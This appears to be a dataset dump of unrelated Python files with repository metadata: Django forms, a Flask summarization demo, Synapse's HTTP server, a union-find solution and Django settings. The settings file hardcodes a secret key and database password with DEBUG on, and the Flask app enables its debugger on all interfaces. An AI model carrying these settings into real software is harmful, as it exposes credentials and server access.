from django import forms from django.contrib.auth.models import User from django.contrib.auth.forms import UserCreationForm as BaseUserCreationForm # from crispy_forms.helper import FormHelper # from crispy_forms.layout import Submit import sys import os from .models import User_Profile sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) from orders.models import Location, Location_Info from orders.locations import get_location_choices class UserCreationForm(BaseUserCreationForm): name = forms.CharField(label="Full Name") location_id = forms.ChoiceField( label="Hospital Location:", help_text="Select an option from the menu above.", choices=get_location_choices()) email = forms.EmailField( required=False, label="Email", help_text = "(not required)" ) phone = forms.CharField( required=False, max_length=12, label="Mobile Number", help_text="(not required)") class Meta: model = User fields = [ "name", "username", "password1", "password2", "location_id", "email", "phone" ] def save(self, commit=True, *args, **kwargs): user = super(UserCreationForm, self).save(commit=False, *args, **kwargs) name = self.cleaned_data["name"] if len(name.split()) >= 2: user.first_name, user.last_name = (name.split()[0].title(), name.split()[-1].title()) elif len(name.split()) == 1: user.first_name = name.title() user.last_name = "" user.set_password(self.cleaned_data["password1"]) user.email = self.cleaned_data["email"] if commit: user.save() user.profile.phone = self.cleaned_data["phone"] location_id = int(self.cleaned_data["location_id"]) loc = Location( username = user.username, location_id = location_id, info = Location_Info.objects.filter(pk=location_id).first() ) loc.save() user.profile.location = loc user.profile.save() user.save() return user class UserUpdateForm(forms.ModelForm): def __init__(self, *args, **kwargs): email = kwargs.get("instance").email super(UserUpdateForm, self).__init__(*args, **kwargs) self.initial["email"] = email # self.helper = FormHelper(self) # self.helper.add_input(Submit("submit", "Submit", css_class="btn btn-outline-info")) # self.helper.form_method = "POST" email = forms.EmailField( required=False, label="Email", help_text = "(not required)") class Meta: model = User fields = ["username", "email"] class ProfileUpdateForm(forms.ModelForm): def __init__(self, *args, **kwargs): location_id = kwargs.get("instance").location.location_id phone = kwargs.get("instance").phone super(ProfileUpdateForm, self).__init__(*args, **kwargs) self.initial["location_id"] = location_id self.initial["phone"] = phone # self.helper = FormHelper(self) # self.helper.add_input(Submit("submit", "Submit", css_class="btn btn-outline-info")) # self.helper.form_method = "POST" location_id = forms.ChoiceField( label="Hospital Location:", help_text="Select an option from the menu above.", choices=get_location_choices()) phone = forms.CharField( required=False, max_length=12, label="Mobile Number", help_text="(not required)") class Meta: model = User_Profile fields = ["image", "location_id", "phone"] def save(self, commit=True, *args, **kwargs): profile = super(ProfileUpdateForm, self).save(commit=False, *args, **kwargs) if commit: profile.save() profile.phone = self.cleaned_data["phone"] new_location_id = int(self.cleaned_data["location_id"]) profile.location.delete() new_location = Location( username = self.instance.user.username, location_id = new_location_id, info = Location_Info.objects.filter(pk=new_location_id).first() ).save() profile.location = new_location profile.save() return profile
33.646617
97
0.604469
from django import forms from django.contrib.auth.models import User from django.contrib.auth.forms import UserCreationForm as BaseUserCreationForm import sys import os from .models import User_Profile sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) from orders.models import Location, Location_Info from orders.locations import get_location_choices class UserCreationForm(BaseUserCreationForm): name = forms.CharField(label="Full Name") location_id = forms.ChoiceField( label="Hospital Location:", help_text="Select an option from the menu above.", choices=get_location_choices()) email = forms.EmailField( required=False, label="Email", help_text = "(not required)" ) phone = forms.CharField( required=False, max_length=12, label="Mobile Number", help_text="(not required)") class Meta: model = User fields = [ "name", "username", "password1", "password2", "location_id", "email", "phone" ] def save(self, commit=True, *args, **kwargs): user = super(UserCreationForm, self).save(commit=False, *args, **kwargs) name = self.cleaned_data["name"] if len(name.split()) >= 2: user.first_name, user.last_name = (name.split()[0].title(), name.split()[-1].title()) elif len(name.split()) == 1: user.first_name = name.title() user.last_name = "" user.set_password(self.cleaned_data["password1"]) user.email = self.cleaned_data["email"] if commit: user.save() user.profile.phone = self.cleaned_data["phone"] location_id = int(self.cleaned_data["location_id"]) loc = Location( username = user.username, location_id = location_id, info = Location_Info.objects.filter(pk=location_id).first() ) loc.save() user.profile.location = loc user.profile.save() user.save() return user class UserUpdateForm(forms.ModelForm): def __init__(self, *args, **kwargs): email = kwargs.get("instance").email super(UserUpdateForm, self).__init__(*args, **kwargs) self.initial["email"] = email email = forms.EmailField( required=False, label="Email", help_text = "(not required)") class Meta: model = User fields = ["username", "email"] class ProfileUpdateForm(forms.ModelForm): def __init__(self, *args, **kwargs): location_id = kwargs.get("instance").location.location_id phone = kwargs.get("instance").phone super(ProfileUpdateForm, self).__init__(*args, **kwargs) self.initial["location_id"] = location_id self.initial["phone"] = phone location_id = forms.ChoiceField( label="Hospital Location:", help_text="Select an option from the menu above.", choices=get_location_choices()) phone = forms.CharField( required=False, max_length=12, label="Mobile Number", help_text="(not required)") class Meta: model = User_Profile fields = ["image", "location_id", "phone"] def save(self, commit=True, *args, **kwargs): profile = super(ProfileUpdateForm, self).save(commit=False, *args, **kwargs) if commit: profile.save() profile.phone = self.cleaned_data["phone"] new_location_id = int(self.cleaned_data["location_id"]) profile.location.delete() new_location = Location( username = self.instance.user.username, location_id = new_location_id, info = Location_Info.objects.filter(pk=new_location_id).first() ).save() profile.location = new_location profile.save() return profile
true
true
f705ab6b22fcd6f8fa7f8f53688eda2185ea5ef3
1,971
py
Python
WebDemo/flask_app/main.py
silenceliang/Cascading-agents-hybridSum
6c127df51bd8cc926878f62ebdb66bc1042bb58c
[ "MIT" ]
1
2020-02-23T15:38:18.000Z
2020-02-23T15:38:18.000Z
WebDemo/flask_app/main.py
silenceliang/CascadingAgentsHybridSum
6c127df51bd8cc926878f62ebdb66bc1042bb58c
[ "MIT" ]
null
null
null
WebDemo/flask_app/main.py
silenceliang/CascadingAgentsHybridSum
6c127df51bd8cc926878f62ebdb66bc1042bb58c
[ "MIT" ]
null
null
null
from flask import render_template, request from flask_script import Manager, Server from app import app from model import Content, Summary, Article import app.static.summ as summarizationModel import os, json, logging @app.route('/', endpoint='ACCESS') @app.route('/index.html', endpoint='ACCESSFILE') def index(): try: all_pairs = Article.objects.all() return render_template('index.html', history=all_pairs) except Exception as e: logging.error(e) raise e @app.route('/run_decode', methods=['POST']) def run_decode(): logging.debug('decode your input by our pretrained model') try: source = request.get_json()['source'] # GET request with String from frontend directly logging.debug('input: {}'.format(source)) # GET String-type context from the backend try: logging.debug('using the pretrained model.') sentNums, summary = summarizationModel.decode.run_(source) except Exception as e: logging.error(e) else: logging.debug('The number of sentences is {}'.format(sentNums)) logging.debug('The abstract is that {}'.format(summary)) results = {'sent_no': sentNums, 'final': summary} try: article = Content(text=source) abstract = Summary(text=summary) pair = Article(article=article.id, abstract=abstract.id) article.save() abstract.save() pair.save() except Exception as e: logging.error(e) return json.dumps(results) except: message = {'message' : 'Fail to catch the data from client.'} return json.dumps(message) manager = Manager(app) manager.add_command('runserver', Server( use_debugger = True, use_reloader = True, host = os.getenv('IP', '0.0.0.0'), port = int(os.getenv('PORT', 5001)) )) if __name__ == "__main__": manager.run()
32.311475
94
0.624049
from flask import render_template, request from flask_script import Manager, Server from app import app from model import Content, Summary, Article import app.static.summ as summarizationModel import os, json, logging @app.route('/', endpoint='ACCESS') @app.route('/index.html', endpoint='ACCESSFILE') def index(): try: all_pairs = Article.objects.all() return render_template('index.html', history=all_pairs) except Exception as e: logging.error(e) raise e @app.route('/run_decode', methods=['POST']) def run_decode(): logging.debug('decode your input by our pretrained model') try: source = request.get_json()['source'] logging.debug('input: {}'.format(source)) try: logging.debug('using the pretrained model.') sentNums, summary = summarizationModel.decode.run_(source) except Exception as e: logging.error(e) else: logging.debug('The number of sentences is {}'.format(sentNums)) logging.debug('The abstract is that {}'.format(summary)) results = {'sent_no': sentNums, 'final': summary} try: article = Content(text=source) abstract = Summary(text=summary) pair = Article(article=article.id, abstract=abstract.id) article.save() abstract.save() pair.save() except Exception as e: logging.error(e) return json.dumps(results) except: message = {'message' : 'Fail to catch the data from client.'} return json.dumps(message) manager = Manager(app) manager.add_command('runserver', Server( use_debugger = True, use_reloader = True, host = os.getenv('IP', '0.0.0.0'), port = int(os.getenv('PORT', 5001)) )) if __name__ == "__main__": manager.run()
true
true
f705abab94d05422bd97d62349625cd2fa0906e4
15,678
py
Python
synapse/http/server.py
theworldbright/synapse
6783534a0f9f34d6972a31af368ee2324e2033f3
[ "Apache-2.0" ]
null
null
null
synapse/http/server.py
theworldbright/synapse
6783534a0f9f34d6972a31af368ee2324e2033f3
[ "Apache-2.0" ]
null
null
null
synapse/http/server.py
theworldbright/synapse
6783534a0f9f34d6972a31af368ee2324e2033f3
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright 2014-2016 OpenMarket Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from synapse.api.errors import ( cs_exception, SynapseError, CodeMessageException, UnrecognizedRequestError, Codes ) from synapse.util.logcontext import LoggingContext, PreserveLoggingContext from synapse.util.caches import intern_dict import synapse.metrics import synapse.events from canonicaljson import ( encode_canonical_json, encode_pretty_printed_json ) from twisted.internet import defer from twisted.web import server, resource from twisted.web.server import NOT_DONE_YET from twisted.web.util import redirectTo import collections import logging import urllib import ujson logger = logging.getLogger(__name__) metrics = synapse.metrics.get_metrics_for(__name__) incoming_requests_counter = metrics.register_counter( "requests", labels=["method", "servlet", "tag"], ) outgoing_responses_counter = metrics.register_counter( "responses", labels=["method", "code"], ) response_timer = metrics.register_distribution( "response_time", labels=["method", "servlet", "tag"] ) response_ru_utime = metrics.register_distribution( "response_ru_utime", labels=["method", "servlet", "tag"] ) response_ru_stime = metrics.register_distribution( "response_ru_stime", labels=["method", "servlet", "tag"] ) response_db_txn_count = metrics.register_distribution( "response_db_txn_count", labels=["method", "servlet", "tag"] ) response_db_txn_duration = metrics.register_distribution( "response_db_txn_duration", labels=["method", "servlet", "tag"] ) _next_request_id = 0 def request_handler(report_metrics=True): """Decorator for ``wrap_request_handler``""" return lambda request_handler: wrap_request_handler(request_handler, report_metrics) def wrap_request_handler(request_handler, report_metrics): """Wraps a method that acts as a request handler with the necessary logging and exception handling. The method must have a signature of "handle_foo(self, request)". The argument "self" must have "version_string" and "clock" attributes. The argument "request" must be a twisted HTTP request. The method must return a deferred. If the deferred succeeds we assume that a response has been sent. If the deferred fails with a SynapseError we use it to send a JSON response with the appropriate HTTP reponse code. If the deferred fails with any other type of error we send a 500 reponse. We insert a unique request-id into the logging context for this request and log the response and duration for this request. """ @defer.inlineCallbacks def wrapped_request_handler(self, request): global _next_request_id request_id = "%s-%s" % (request.method, _next_request_id) _next_request_id += 1 with LoggingContext(request_id) as request_context: if report_metrics: request_metrics = RequestMetrics() request_metrics.start(self.clock) request_context.request = request_id with request.processing(): try: with PreserveLoggingContext(request_context): yield request_handler(self, request) except CodeMessageException as e: code = e.code if isinstance(e, SynapseError): logger.info( "%s SynapseError: %s - %s", request, code, e.msg ) else: logger.exception(e) outgoing_responses_counter.inc(request.method, str(code)) respond_with_json( request, code, cs_exception(e), send_cors=True, pretty_print=_request_user_agent_is_curl(request), version_string=self.version_string, ) except: logger.exception( "Failed handle request %s.%s on %r: %r", request_handler.__module__, request_handler.__name__, self, request ) respond_with_json( request, 500, { "error": "Internal server error", "errcode": Codes.UNKNOWN, }, send_cors=True ) finally: try: if report_metrics: request_metrics.stop( self.clock, request, self.__class__.__name__ ) except: pass return wrapped_request_handler class HttpServer(object): """ Interface for registering callbacks on a HTTP server """ def register_paths(self, method, path_patterns, callback): """ Register a callback that gets fired if we receive a http request with the given method for a path that matches the given regex. If the regex contains groups these gets passed to the calback via an unpacked tuple. Args: method (str): The method to listen to. path_patterns (list<SRE_Pattern>): The regex used to match requests. callback (function): The function to fire if we receive a matched request. The first argument will be the request object and subsequent arguments will be any matched groups from the regex. This should return a tuple of (code, response). """ pass class JsonResource(HttpServer, resource.Resource): """ This implements the HttpServer interface and provides JSON support for Resources. Register callbacks via register_path() Callbacks can return a tuple of status code and a dict in which case the the dict will automatically be sent to the client as a JSON object. The JsonResource is primarily intended for returning JSON, but callbacks may send something other than JSON, they may do so by using the methods on the request object and instead returning None. """ isLeaf = True _PathEntry = collections.namedtuple("_PathEntry", ["pattern", "callback"]) def __init__(self, hs, canonical_json=True): resource.Resource.__init__(self) self.canonical_json = canonical_json self.clock = hs.get_clock() self.path_regexs = {} self.version_string = hs.version_string self.hs = hs def register_paths(self, method, path_patterns, callback): for path_pattern in path_patterns: self.path_regexs.setdefault(method, []).append( self._PathEntry(path_pattern, callback) ) def render(self, request): """ This gets called by twisted every time someone sends us a request. """ self._async_render(request) return server.NOT_DONE_YET # Disable metric reporting because _async_render does its own metrics. # It does its own metric reporting because _async_render dispatches to # a callback and it's the class name of that callback we want to report # against rather than the JsonResource itself. @request_handler(report_metrics=False) @defer.inlineCallbacks def _async_render(self, request): """ This gets called from render() every time someone sends us a request. This checks if anyone has registered a callback for that method and path. """ if request.method == "OPTIONS": self._send_response(request, 200, {}) return request_metrics = RequestMetrics() request_metrics.start(self.clock) # Loop through all the registered callbacks to check if the method # and path regex match for path_entry in self.path_regexs.get(request.method, []): m = path_entry.pattern.match(request.path) if not m: continue # We found a match! Trigger callback and then return the # returned response. We pass both the request and any # matched groups from the regex to the callback. callback = path_entry.callback servlet_instance = getattr(callback, "__self__", None) if servlet_instance is not None: servlet_classname = servlet_instance.__class__.__name__ else: servlet_classname = "%r" % callback kwargs = intern_dict({ name: urllib.unquote(value).decode("UTF-8") if value else value for name, value in m.groupdict().items() }) callback_return = yield callback(request, **kwargs) if callback_return is not None: code, response = callback_return self._send_response(request, code, response) try: request_metrics.stop(self.clock, request, servlet_classname) except: pass return # Huh. No one wanted to handle that? Fiiiiiine. Send 400. raise UnrecognizedRequestError() def _send_response(self, request, code, response_json_object, response_code_message=None): # could alternatively use request.notifyFinish() and flip a flag when # the Deferred fires, but since the flag is RIGHT THERE it seems like # a waste. if request._disconnected: logger.warn( "Not sending response to request %s, already disconnected.", request) return outgoing_responses_counter.inc(request.method, str(code)) # TODO: Only enable CORS for the requests that need it. respond_with_json( request, code, response_json_object, send_cors=True, response_code_message=response_code_message, pretty_print=_request_user_agent_is_curl(request), version_string=self.version_string, canonical_json=self.canonical_json, ) class RequestMetrics(object): def start(self, clock): self.start = clock.time_msec() self.start_context = LoggingContext.current_context() def stop(self, clock, request, servlet_classname): context = LoggingContext.current_context() tag = "" if context: tag = context.tag if context != self.start_context: logger.warn( "Context have unexpectedly changed %r, %r", context, self.start_context ) return incoming_requests_counter.inc(request.method, servlet_classname, tag) response_timer.inc_by( clock.time_msec() - self.start, request.method, servlet_classname, tag ) ru_utime, ru_stime = context.get_resource_usage() response_ru_utime.inc_by( ru_utime, request.method, servlet_classname, tag ) response_ru_stime.inc_by( ru_stime, request.method, servlet_classname, tag ) response_db_txn_count.inc_by( context.db_txn_count, request.method, servlet_classname, tag ) response_db_txn_duration.inc_by( context.db_txn_duration, request.method, servlet_classname, tag ) class RootRedirect(resource.Resource): """Redirects the root '/' path to another path.""" def __init__(self, path): resource.Resource.__init__(self) self.url = path def render_GET(self, request): return redirectTo(self.url, request) def getChild(self, name, request): if len(name) == 0: return self # select ourselves as the child to render return resource.Resource.getChild(self, name, request) def respond_with_json(request, code, json_object, send_cors=False, response_code_message=None, pretty_print=False, version_string="", canonical_json=True): if pretty_print: json_bytes = encode_pretty_printed_json(json_object) + "\n" else: if canonical_json or synapse.events.USE_FROZEN_DICTS: json_bytes = encode_canonical_json(json_object) else: # ujson doesn't like frozen_dicts. json_bytes = ujson.dumps(json_object, ensure_ascii=False) return respond_with_json_bytes( request, code, json_bytes, send_cors=send_cors, response_code_message=response_code_message, version_string=version_string ) def respond_with_json_bytes(request, code, json_bytes, send_cors=False, version_string="", response_code_message=None): """Sends encoded JSON in response to the given request. Args: request (twisted.web.http.Request): The http request to respond to. code (int): The HTTP response code. json_bytes (bytes): The json bytes to use as the response body. send_cors (bool): Whether to send Cross-Origin Resource Sharing headers http://www.w3.org/TR/cors/ Returns: twisted.web.server.NOT_DONE_YET""" request.setResponseCode(code, message=response_code_message) request.setHeader(b"Content-Type", b"application/json") request.setHeader(b"Server", version_string) request.setHeader(b"Content-Length", b"%d" % (len(json_bytes),)) if send_cors: request.setHeader("Access-Control-Allow-Origin", "*") request.setHeader("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE, OPTIONS") request.setHeader("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept") request.write(json_bytes) finish_request(request) return NOT_DONE_YET def finish_request(request): """ Finish writing the response to the request. Twisted throws a RuntimeException if the connection closed before the response was written but doesn't provide a convenient or reliable way to determine if the connection was closed. So we catch and log the RuntimeException You might think that ``request.notifyFinish`` could be used to tell if the request was finished. However the deferred it returns won't fire if the connection was already closed, meaning we'd have to have called the method right at the start of the request. By the time we want to write the response it will already be too late. """ try: request.finish() except RuntimeError as e: logger.info("Connection disconnected before response was written: %r", e) def _request_user_agent_is_curl(request): user_agents = request.requestHeaders.getRawHeaders( "User-Agent", default=[] ) for user_agent in user_agents: if "curl" in user_agent: return True return False
36.124424
88
0.637518
from synapse.api.errors import ( cs_exception, SynapseError, CodeMessageException, UnrecognizedRequestError, Codes ) from synapse.util.logcontext import LoggingContext, PreserveLoggingContext from synapse.util.caches import intern_dict import synapse.metrics import synapse.events from canonicaljson import ( encode_canonical_json, encode_pretty_printed_json ) from twisted.internet import defer from twisted.web import server, resource from twisted.web.server import NOT_DONE_YET from twisted.web.util import redirectTo import collections import logging import urllib import ujson logger = logging.getLogger(__name__) metrics = synapse.metrics.get_metrics_for(__name__) incoming_requests_counter = metrics.register_counter( "requests", labels=["method", "servlet", "tag"], ) outgoing_responses_counter = metrics.register_counter( "responses", labels=["method", "code"], ) response_timer = metrics.register_distribution( "response_time", labels=["method", "servlet", "tag"] ) response_ru_utime = metrics.register_distribution( "response_ru_utime", labels=["method", "servlet", "tag"] ) response_ru_stime = metrics.register_distribution( "response_ru_stime", labels=["method", "servlet", "tag"] ) response_db_txn_count = metrics.register_distribution( "response_db_txn_count", labels=["method", "servlet", "tag"] ) response_db_txn_duration = metrics.register_distribution( "response_db_txn_duration", labels=["method", "servlet", "tag"] ) _next_request_id = 0 def request_handler(report_metrics=True): return lambda request_handler: wrap_request_handler(request_handler, report_metrics) def wrap_request_handler(request_handler, report_metrics): @defer.inlineCallbacks def wrapped_request_handler(self, request): global _next_request_id request_id = "%s-%s" % (request.method, _next_request_id) _next_request_id += 1 with LoggingContext(request_id) as request_context: if report_metrics: request_metrics = RequestMetrics() request_metrics.start(self.clock) request_context.request = request_id with request.processing(): try: with PreserveLoggingContext(request_context): yield request_handler(self, request) except CodeMessageException as e: code = e.code if isinstance(e, SynapseError): logger.info( "%s SynapseError: %s - %s", request, code, e.msg ) else: logger.exception(e) outgoing_responses_counter.inc(request.method, str(code)) respond_with_json( request, code, cs_exception(e), send_cors=True, pretty_print=_request_user_agent_is_curl(request), version_string=self.version_string, ) except: logger.exception( "Failed handle request %s.%s on %r: %r", request_handler.__module__, request_handler.__name__, self, request ) respond_with_json( request, 500, { "error": "Internal server error", "errcode": Codes.UNKNOWN, }, send_cors=True ) finally: try: if report_metrics: request_metrics.stop( self.clock, request, self.__class__.__name__ ) except: pass return wrapped_request_handler class HttpServer(object): def register_paths(self, method, path_patterns, callback): pass class JsonResource(HttpServer, resource.Resource): isLeaf = True _PathEntry = collections.namedtuple("_PathEntry", ["pattern", "callback"]) def __init__(self, hs, canonical_json=True): resource.Resource.__init__(self) self.canonical_json = canonical_json self.clock = hs.get_clock() self.path_regexs = {} self.version_string = hs.version_string self.hs = hs def register_paths(self, method, path_patterns, callback): for path_pattern in path_patterns: self.path_regexs.setdefault(method, []).append( self._PathEntry(path_pattern, callback) ) def render(self, request): self._async_render(request) return server.NOT_DONE_YET # against rather than the JsonResource itself. @request_handler(report_metrics=False) @defer.inlineCallbacks def _async_render(self, request): if request.method == "OPTIONS": self._send_response(request, 200, {}) return request_metrics = RequestMetrics() request_metrics.start(self.clock) # Loop through all the registered callbacks to check if the method # and path regex match for path_entry in self.path_regexs.get(request.method, []): m = path_entry.pattern.match(request.path) if not m: continue # We found a match! Trigger callback and then return the # returned response. We pass both the request and any # matched groups from the regex to the callback. callback = path_entry.callback servlet_instance = getattr(callback, "__self__", None) if servlet_instance is not None: servlet_classname = servlet_instance.__class__.__name__ else: servlet_classname = "%r" % callback kwargs = intern_dict({ name: urllib.unquote(value).decode("UTF-8") if value else value for name, value in m.groupdict().items() }) callback_return = yield callback(request, **kwargs) if callback_return is not None: code, response = callback_return self._send_response(request, code, response) try: request_metrics.stop(self.clock, request, servlet_classname) except: pass return # Huh. No one wanted to handle that? Fiiiiiine. Send 400. raise UnrecognizedRequestError() def _send_response(self, request, code, response_json_object, response_code_message=None): # could alternatively use request.notifyFinish() and flip a flag when # the Deferred fires, but since the flag is RIGHT THERE it seems like # a waste. if request._disconnected: logger.warn( "Not sending response to request %s, already disconnected.", request) return outgoing_responses_counter.inc(request.method, str(code)) # TODO: Only enable CORS for the requests that need it. respond_with_json( request, code, response_json_object, send_cors=True, response_code_message=response_code_message, pretty_print=_request_user_agent_is_curl(request), version_string=self.version_string, canonical_json=self.canonical_json, ) class RequestMetrics(object): def start(self, clock): self.start = clock.time_msec() self.start_context = LoggingContext.current_context() def stop(self, clock, request, servlet_classname): context = LoggingContext.current_context() tag = "" if context: tag = context.tag if context != self.start_context: logger.warn( "Context have unexpectedly changed %r, %r", context, self.start_context ) return incoming_requests_counter.inc(request.method, servlet_classname, tag) response_timer.inc_by( clock.time_msec() - self.start, request.method, servlet_classname, tag ) ru_utime, ru_stime = context.get_resource_usage() response_ru_utime.inc_by( ru_utime, request.method, servlet_classname, tag ) response_ru_stime.inc_by( ru_stime, request.method, servlet_classname, tag ) response_db_txn_count.inc_by( context.db_txn_count, request.method, servlet_classname, tag ) response_db_txn_duration.inc_by( context.db_txn_duration, request.method, servlet_classname, tag ) class RootRedirect(resource.Resource): def __init__(self, path): resource.Resource.__init__(self) self.url = path def render_GET(self, request): return redirectTo(self.url, request) def getChild(self, name, request): if len(name) == 0: return self # select ourselves as the child to render return resource.Resource.getChild(self, name, request) def respond_with_json(request, code, json_object, send_cors=False, response_code_message=None, pretty_print=False, version_string="", canonical_json=True): if pretty_print: json_bytes = encode_pretty_printed_json(json_object) + "\n" else: if canonical_json or synapse.events.USE_FROZEN_DICTS: json_bytes = encode_canonical_json(json_object) else: # ujson doesn't like frozen_dicts. json_bytes = ujson.dumps(json_object, ensure_ascii=False) return respond_with_json_bytes( request, code, json_bytes, send_cors=send_cors, response_code_message=response_code_message, version_string=version_string ) def respond_with_json_bytes(request, code, json_bytes, send_cors=False, version_string="", response_code_message=None): request.setResponseCode(code, message=response_code_message) request.setHeader(b"Content-Type", b"application/json") request.setHeader(b"Server", version_string) request.setHeader(b"Content-Length", b"%d" % (len(json_bytes),)) if send_cors: request.setHeader("Access-Control-Allow-Origin", "*") request.setHeader("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE, OPTIONS") request.setHeader("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept") request.write(json_bytes) finish_request(request) return NOT_DONE_YET def finish_request(request): try: request.finish() except RuntimeError as e: logger.info("Connection disconnected before response was written: %r", e) def _request_user_agent_is_curl(request): user_agents = request.requestHeaders.getRawHeaders( "User-Agent", default=[] ) for user_agent in user_agents: if "curl" in user_agent: return True return False
true
true
f705ae64cdecffa5cafbe9b36e37245e035fb0b5
1,380
py
Python
hackerearth/Algorithms/Feasible relations/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
4
2020-07-24T01:59:50.000Z
2021-07-24T15:14:08.000Z
hackerearth/Algorithms/Feasible relations/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
null
null
null
hackerearth/Algorithms/Feasible relations/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
null
null
null
""" # Sample code to perform I/O: name = input() # Reading input from STDIN print('Hi, %s.' % name) # Writing output to STDOUT # Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail """ # Write your code here from collections import deque, defaultdict from sys import stdin def check_connected(x, connected, adjacency): stack = deque([x]) while stack: u = stack.pop() for v in adjacency[u]: if v not in connected: connected[v] = x stack.append(v) t = int(stdin.readline()) for _ in range(t): n, k = map(int, stdin.readline().strip().split()) equalities = defaultdict(set) inequalities = [] for _ in range(k): x1, r, x2 = stdin.readline().strip().split() x1 = int(x1) x2 = int(x2) if r == '=': equalities[x1].add(x2) equalities[x2].add(x1) else: inequalities.append((x1, x2)) connected_components = {} for i in range(1, n + 1): if i not in connected_components: connected_components[i] = i check_connected(i, connected_components, equalities) for x1, x2 in inequalities: if connected_components[x1] == connected_components[x2]: print('NO') break else: print('YES')
27.6
94
0.571739
from collections import deque, defaultdict from sys import stdin def check_connected(x, connected, adjacency): stack = deque([x]) while stack: u = stack.pop() for v in adjacency[u]: if v not in connected: connected[v] = x stack.append(v) t = int(stdin.readline()) for _ in range(t): n, k = map(int, stdin.readline().strip().split()) equalities = defaultdict(set) inequalities = [] for _ in range(k): x1, r, x2 = stdin.readline().strip().split() x1 = int(x1) x2 = int(x2) if r == '=': equalities[x1].add(x2) equalities[x2].add(x1) else: inequalities.append((x1, x2)) connected_components = {} for i in range(1, n + 1): if i not in connected_components: connected_components[i] = i check_connected(i, connected_components, equalities) for x1, x2 in inequalities: if connected_components[x1] == connected_components[x2]: print('NO') break else: print('YES')
true
true
f705ae9c256c532814c09ac996b19cab9acfb4e3
2,527
py
Python
old/apply/apply/settings.py
neonsoftware/yard
5f2fda72c7a3f330d2442002687ff4d1dfb21680
[ "MIT" ]
1
2015-03-11T07:43:09.000Z
2015-03-11T07:43:09.000Z
old/apply/apply/settings.py
neonsoftware/yard
5f2fda72c7a3f330d2442002687ff4d1dfb21680
[ "MIT" ]
5
2015-05-17T18:22:29.000Z
2015-08-15T17:27:03.000Z
old/apply/apply/settings.py
neonsoftware/yard
5f2fda72c7a3f330d2442002687ff4d1dfb21680
[ "MIT" ]
null
null
null
""" Django settings for apply project. For more information on this file, see https://docs.djangoproject.com/en/1.6/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.6/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '--v$_^*0r5(ok1^2sxdm4w_wwskvuv-z0tcop+yf1-m@+7p#5i' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'gunicorn', 'bootstrapform', 'yard', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'apply.urls' WSGI_APPLICATION = 'apply.wsgi.application' # Database # https://docs.djangoproject.com/en/1.6/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'. 'NAME': 'yard', # Or path to database file if using sqlite3. 'USER': 'frankie', # Not used with sqlite3. 'PASSWORD': 'frankie', # Not used with sqlite3. 'HOST': '', # Set to empty string for localhost. Not used with sqlite3. 'PORT': '', # Set to empty string for default. Not used with sqlite3. } } # Internationalization # https://docs.djangoproject.com/en/1.6/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.6/howto/static-files/ STATIC_URL = '/static/' DOCS_URL = BASE_DIR + '/yard/static/docs/' LOGGING = { 'version': 1, } LOGIN_REDIRECT_URL="/"
25.019802
103
0.688564
